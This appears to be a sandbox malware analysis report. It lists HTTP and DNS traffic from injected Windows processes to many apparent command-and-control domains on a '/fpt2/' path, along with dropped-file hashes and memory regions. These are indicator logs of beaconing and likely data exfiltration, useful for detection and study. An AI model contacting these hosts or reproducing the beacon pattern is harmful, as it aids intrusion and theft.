        GET /fpt2/?pz=6mvp3dQCPu60jkMtL2C2VIKMpc76AW5qzkZ3VNug8x7oYZTXy45EFsXFukAZsy2YWLqM/SaDtNDJGljH2QpsieZaLwCb&YF6=MRgpt- HTTP/1.1
        Host: www.gdyanjiu.icu
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Language: en-US,en;q=0.9
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Response
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Wed, 22 Nov 2023 05:20:34 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
      • 136.243.92.92:80
        http://www.mobdigim.com/fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt-
        http
        Explorer.EXE
        680 B
        1.2kB
        5
        5

        HTTP Request

        GET http://www.mobdigim.com/fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt-

        HTTP Response

        301
      • 45.33.6.223:80
        http://www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip
        http
        mstsc.exe
        9.3kB
        504.5kB
        194
        365

        HTTP Request

        GET http://www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip

        HTTP Response

        200
      • 91.194.2.86:80
        http://www.finebb.net/fpt2/
        http
        Explorer.EXE
        1.2kB
        13.5kB
        10
        13

        HTTP Request

        POST http://www.finebb.net/fpt2/

        HTTP Response

        301
      • 91.194.2.86:80
        http://www.finebb.net/fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt-
        http
        Explorer.EXE
        908 B
        13.6kB
        10
        14

        HTTP Request

        GET http://www.finebb.net/fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt-

        HTTP Response

        301
      • 34.92.57.107:80
        http://www.yf168vip.com/fpt2/
        http
        Explorer.EXE
        961 B
        863 B
        5
        4

        HTTP Request

        POST http://www.yf168vip.com/fpt2/

        HTTP Response

        404
      • 34.92.57.107:80
        http://www.yf168vip.com/fpt2/?pz=+Pv5RKJKlOGhsp9xzDjtrCt3KaT+wN1FLngvtNJPFyCXQ9yT2cbGZ5T7ZO2Qq14r+5AArPVFnIkI6MVJnjcaY83B5jvg&YF6=MRgpt-
        http
        Explorer.EXE
        680 B
        903 B
        5
        5

        HTTP Request

        GET http://www.yf168vip.com/fpt2/?pz=+Pv5RKJKlOGhsp9xzDjtrCt3KaT+wN1FLngvtNJPFyCXQ9yT2cbGZ5T7ZO2Qq14r+5AArPVFnIkI6MVJnjcaY83B5jvg&YF6=MRgpt-

        HTTP Response

        404
      • 13.248.169.48:80
        http://www.shortfall.net/fpt2/
        http
        Explorer.EXE
        1.0kB
        1.1kB
        6
        5

        HTTP Request

        POST http://www.shortfall.net/fpt2/

        HTTP Response

        405
      • 13.248.169.48:80
        http://www.shortfall.net/fpt2/?pz=BEk/HyvD1ApKclZgHhHVoRJGXzHFyBd9iCFWFrLupWJDmJhCU+tan5xFERllc5FlkjcoiH4tpQ3GJxurFh9q9fs5VQOK&YF6=MRgpt-
        http
        Explorer.EXE
        1.0kB
        13.9kB
        13
        18

        HTTP Request

        GET http://www.shortfall.net/fpt2/?pz=BEk/HyvD1ApKclZgHhHVoRJGXzHFyBd9iCFWFrLupWJDmJhCU+tan5xFERllc5FlkjcoiH4tpQ3GJxurFh9q9fs5VQOK&YF6=MRgpt-

        HTTP Response

        200
      • 203.161.61.170:80
        http://www.tecverse.xyz/fpt2/
        http
        Explorer.EXE
        961 B
        1.0kB
        5
        4

        HTTP Request

        POST http://www.tecverse.xyz/fpt2/

        HTTP Response

        404
      • 203.161.61.170:80
        http://www.tecverse.xyz/fpt2/?pz=kmEA0abd5YyeJVI62R5X7XpLu+SmFuKVzFUIPRx4j4eSHm+QbJspSaqzIrLQdJsv4iNbR93ZPS2DputNIuZEk+22xRga&YF6=MRgpt-
        http
        Explorer.EXE
        680 B
        1.1kB
        5
        5

        HTTP Request

        GET http://www.tecverse.xyz/fpt2/?pz=kmEA0abd5YyeJVI62R5X7XpLu+SmFuKVzFUIPRx4j4eSHm+QbJspSaqzIrLQdJsv4iNbR93ZPS2DputNIuZEk+22xRga&YF6=MRgpt-

        HTTP Response

        404
      • 185.83.146.204:80
        http://www.hreeremaeps.com/fpt2/
        http
        Explorer.EXE
        970 B
        401 B
        5
        4

        HTTP Request

        POST http://www.hreeremaeps.com/fpt2/

        HTTP Response

        404
      • 185.83.146.204:80
        http://www.hreeremaeps.com/fpt2/?pz=PVLQ1OYcDtmtS6mlaIs9mafN1rqX6opagePU/1WVbH2sXsdip4LlZsLtbV4mevB5sNCA1FFZdfEVrxwxl5AqGiugiysq&YF6=MRgpt-
        http
        Explorer.EXE
        683 B
        441 B
        5
        5

        HTTP Request

        GET http://www.hreeremaeps.com/fpt2/?pz=PVLQ1OYcDtmtS6mlaIs9mafN1rqX6opagePU/1WVbH2sXsdip4LlZsLtbV4mevB5sNCA1FFZdfEVrxwxl5AqGiugiysq&YF6=MRgpt-

        HTTP Response

        404
      • 208.91.197.132:80
        http://www.shopbons-mall.com/fpt2/
        http
        Explorer.EXE
        884 B
        92 B
        3
        2

        HTTP Request

        POST http://www.shopbons-mall.com/fpt2/
      • 208.91.197.132:80
        http://www.shopbons-mall.com/fpt2/?pz=6UkeOgRo4ePloh1yFoxHPsMfzZ6p6zlaujZ8SKHBP3+vyOlbx4lZ4H+sEihSMXlzaeFJp2Nsdm5H90jVgpEuC4hvrEHL&YF6=MRgpt-
        http
        Explorer.EXE
        1.1kB
        20.4kB
        13
        19

        HTTP Request

        GET http://www.shopbons-mall.com/fpt2/?pz=6UkeOgRo4ePloh1yFoxHPsMfzZ6p6zlaujZ8SKHBP3+vyOlbx4lZ4H+sEihSMXlzaeFJp2Nsdm5H90jVgpEuC4hvrEHL&YF6=MRgpt-

        HTTP Response

        200
      • 188.114.96.0:80
        http://www.cmmug.asia/fpt2/
        http
        Explorer.EXE
        1.1kB
        7.5kB
        8
        9

        HTTP Request

        POST http://www.cmmug.asia/fpt2/

        HTTP Response

        502
      • 188.114.96.0:80
        http://www.cmmug.asia/fpt2/?pz=v+WmR1cg7tS0xW3sxOcH7qLyIjHIvwIYt3SWFLykJ0c2lILgMSLvRqA6qw3Mnj882j+rmYnjx3WL99L/u7fVyIhDBdb9&YF6=MRgpt-
        http
        Explorer.EXE
        678 B
        981 B
        5
        5

        HTTP Request

        GET http://www.cmmug.asia/fpt2/?pz=v+WmR1cg7tS0xW3sxOcH7qLyIjHIvwIYt3SWFLykJ0c2lILgMSLvRqA6qw3Mnj882j+rmYnjx3WL99L/u7fVyIhDBdb9&YF6=MRgpt-

        HTTP Response

        502
      • 34.120.175.65:80
        http://www.333vvs.com/fpt2/
        http
        Explorer.EXE
        955 B
        907 B
        5
        4

        HTTP Request

        POST http://www.333vvs.com/fpt2/

        HTTP Response

        405
      • 34.120.175.65:80
        http://www.333vvs.com/fpt2/?pz=fXnFlfaj4bnF07Ur9jveJK9dI70BJd2bKF9irEfQcuBCqwd6ATMFeUvwAAuNXbAn8HdTrUcpf4Du0ZgIUjZaDVOeDAKa&YF6=MRgpt-
        http
        Explorer.EXE
        770 B
        5.9kB
        7
        9

        HTTP Request

        GET http://www.333vvs.com/fpt2/?pz=fXnFlfaj4bnF07Ur9jveJK9dI70BJd2bKF9irEfQcuBCqwd6ATMFeUvwAAuNXbAn8HdTrUcpf4Du0ZgIUjZaDVOeDAKa&YF6=MRgpt-

        HTTP Response

        200
      • 8.217.92.5:80
        http://www.gdyanjiu.icu/fpt2/
        http
        Explorer.EXE
        961 B
        863 B
        5
        4

        HTTP Request

        POST http://www.gdyanjiu.icu/fpt2/

        HTTP Response

        404
      • 8.217.92.5:80
        http://www.gdyanjiu.icu/fpt2/?pz=6mvp3dQCPu60jkMtL2C2VIKMpc76AW5qzkZ3VNug8x7oYZTXy45EFsXFukAZsy2YWLqM/SaDtNDJGljH2QpsieZaLwCb&YF6=MRgpt-
        http
        Explorer.EXE
        680 B
        903 B
        5
        5

        HTTP Request

        GET http://www.gdyanjiu.icu/fpt2/?pz=6mvp3dQCPu60jkMtL2C2VIKMpc76AW5qzkZ3VNug8x7oYZTXy45EFsXFukAZsy2YWLqM/SaDtNDJGljH2QpsieZaLwCb&YF6=MRgpt-

        HTTP Response

        404
      • 8.8.8.8:53
        www.ljwixsb.top
        dns
        Explorer.EXE
        61 B
        131 B
        1
        1

        DNS Request

        www.ljwixsb.top

      • 8.8.8.8:53
        www.mobdigim.com
        dns
        Explorer.EXE
        62 B
        92 B
        1
        1

        DNS Request

        www.mobdigim.com

        DNS Response

        136.243.92.92

      • 8.8.8.8:53
        www.sqlite.org
        dns
        mstsc.exe
        60 B
        76 B
        1
        1

        DNS Request

        www.sqlite.org

        DNS Response

        45.33.6.223

      • 8.8.8.8:53
        www.finebb.net
        dns
        Explorer.EXE
        60 B
        76 B
        1
        1

        DNS Request

        www.finebb.net

        DNS Response

        91.194.2.86

      • 8.8.8.8:53
        www.yf168vip.com
        dns
        Explorer.EXE
        62 B
        111 B
        1
        1

        DNS Request

        www.yf168vip.com

        DNS Response

        34.92.57.107

      • 8.8.8.8:53
        www.shortfall.net
        dns
        Explorer.EXE
        63 B
        95 B
        1
        1

        DNS Request

        www.shortfall.net

        DNS Response

        13.248.169.48
        76.223.54.146

      • 8.8.8.8:53
        www.tecverse.xyz
        dns
        Explorer.EXE
        62 B
        78 B
        1
        1

        DNS Request

        www.tecverse.xyz

        DNS Response

        203.161.61.170

      • 8.8.8.8:53
        www.hreeremaeps.com
        dns
        Explorer.EXE
        65 B
        95 B
        1
        1

        DNS Request

        www.hreeremaeps.com

        DNS Response

        185.83.146.204

      • 8.8.8.8:53
        www.shopbons-mall.com
        dns
        Explorer.EXE
        67 B
        83 B
        1
        1

        DNS Request

        www.shopbons-mall.com

        DNS Response

        208.91.197.132

      • 8.8.8.8:53
        www.cmmug.asia
        dns
        Explorer.EXE
        60 B
        92 B
        1
        1

        DNS Request

        www.cmmug.asia

        DNS Response

        188.114.96.0
        188.114.97.0

      • 8.8.8.8:53
        www.333vvs.com
        dns
        Explorer.EXE
        60 B
        92 B
        1
        1

        DNS Request

        www.333vvs.com

        DNS Response

        34.120.175.65
        35.244.161.158

      • 8.8.8.8:53
        www.gdyanjiu.icu
        dns
        Explorer.EXE
        62 B
        104 B
        1
        1

        DNS Request

        www.gdyanjiu.icu

        DNS Response

        8.217.92.5

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

        Filesize

        200KB

        MD5

        e2b11a71264882a61a309c24903c5696

        SHA1

        5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

        SHA256

        b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

        SHA512

        bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

      • C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

        Filesize

        200KB

        MD5

        e2b11a71264882a61a309c24903c5696

        SHA1

        5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

        SHA256

        b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

        SHA512

        bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

      • C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

        Filesize

        200KB

        MD5

        e2b11a71264882a61a309c24903c5696

        SHA1

        5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

        SHA256

        b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

        SHA512

        bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

      • C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

        Filesize

        200KB

        MD5

        e2b11a71264882a61a309c24903c5696

        SHA1

        5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

        SHA256

        b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

        SHA512

        bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

      • C:\Users\Admin\AppData\Local\Temp\pqndp.yn

        Filesize

        250KB

        MD5

        daf88cc0b867ad283c8de71074574e3d

        SHA1

        3f70e96bd3daa0e0dd2db29c14cc3dd7ea8239e9

        SHA256

        9ce0418bda184b005a58c40a535740cb0b4a5bd946f4fd913512109915831e08

        SHA512

        76f62207afc5268c6e43317f412409322449febaf1ea9765153b95e394d2494b935eaf3b46b6f8149ef49d3b199ecad5043b208e6975a4150d1b84722a8f938b

      • C:\Users\Admin\AppData\Local\Temp\tpaxc.zip

        Filesize

        478KB

        MD5

        72b88067a5a1a4f8d52c45e6621d13fe

        SHA1

        f84542474b8583f4371749282e5cc4d52661c222

        SHA256

        70a11669bb8ad1099fd7fba9da92e1a75124bef0d16a01fd10dcdc45e9582092

        SHA512

        a8bf75fd4f38e4c8dee5e6f2527062c5be21f5a8bae4ea561f4aa28139d65a6f215afb212f1e4857ee482e16e813fc0d63ef8ec43ec94d5f8a722489e89e154d

      • \Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

        Filesize

        200KB

        MD5

        e2b11a71264882a61a309c24903c5696

        SHA1

        5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

        SHA256

        b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

        SHA512

        bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

      • \Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

        Filesize

        200KB

        MD5

        e2b11a71264882a61a309c24903c5696

        SHA1

        5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

        SHA256

        b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

        SHA512

        bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

      • \Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

        Filesize

        200KB

        MD5

        e2b11a71264882a61a309c24903c5696

        SHA1

        5341f71ee94eb7e32f0fb588a5fe95ebbf06e772

        SHA256

        b77970e17899b7bd5266444aa666e3d7f39da83878bf09cb6dcd111e9eb5dec5

        SHA512

        bfe3ff2120531edf0b61d436717c1644da5d4f68ba0470977c7c87f6565d683686e55c183a411c7abbddc8547a45db8bd6372fe52bc33fe7a914548b20b6b906

      • \Users\Admin\AppData\Local\Temp\sqlite3.dll

        Filesize

        910KB

        MD5

        d79258c5189103d69502eac786addb04

        SHA1

        f34b33681cfe8ce649218173a7f58b237821c1ef

        SHA256

        57d89a52061d70d87e40281f1196d53273f87860c4d707d667a8c7d9573da675

        SHA512

        da797f4dd1ad628aa4e8004b2e00b7c278facbc57a313f56b70dc8fcfbdb0050ea8b025b3475098223cce96ea53537d678273656d46c2d33d81b496d90da34b2

      • memory/1192-35-0x00000000089C0000-0x000000000ABB7000-memory.dmp

        Filesize

        34.0MB

      • memory/1192-79-0x0000000006A20000-0x0000000006B22000-memory.dmp

        Filesize

        1.0MB

      • memory/1192-24-0x00000000089C0000-0x000000000ABB7000-memory.dmp

        Filesize

        34.0MB

      • memory/1192-34-0x0000000006A20000-0x0000000006B22000-memory.dmp

        Filesize

        1.0MB

      • memory/1192-21-0x0000000003760000-0x0000000003860000-memory.dmp

        Filesize

        1024KB

      • memory/1192-33-0x0000000006A20000-0x0000000006B22000-memory.dmp

        Filesize

        1.0MB

      • memory/2152-9-0x00000000001B0000-0x00000000001B2000-memory.dmp

        Filesize

        8KB

      • memory/2552-23-0x00000000003D0000-0x00000000003F3000-memory.dmp

        Filesize

        140KB

      • memory/2552-16-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2552-14-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2552-27-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2552-29-0x00000000003D0000-0x00000000003F3000-memory.dmp

        Filesize

        140KB

      • memory/2552-17-0x00000000008B0000-0x0000000000BB3000-memory.dmp

        Filesize

        3.0MB

      • memory/2552-18-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2552-22-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2552-20-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2896-32-0x00000000009B0000-0x0000000000A52000-memory.dmp

        Filesize

        648KB

      • memory/2896-30-0x0000000002090000-0x0000000002393000-memory.dmp

        Filesize

        3.0MB

      • memory/2896-36-0x0000000000080000-0x00000000000B6000-memory.dmp

        Filesize

        216KB

      • memory/2896-31-0x0000000000080000-0x00000000000B6000-memory.dmp

        Filesize

        216KB

      • memory/2896-25-0x0000000000080000-0x00000000000B6000-memory.dmp

        Filesize

        216KB

      • memory/2896-77-0x0000000061E00000-0x0000000061ECF000-memory.dmp

        Filesize

        828KB

      • memory/2896-78-0x00000000009B0000-0x0000000000A52000-memory.dmp

        Filesize

        648KB

      • memory/2896-26-0x0000000000080000-0x00000000000B6000-memory.dmp

        Filesize

        216KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.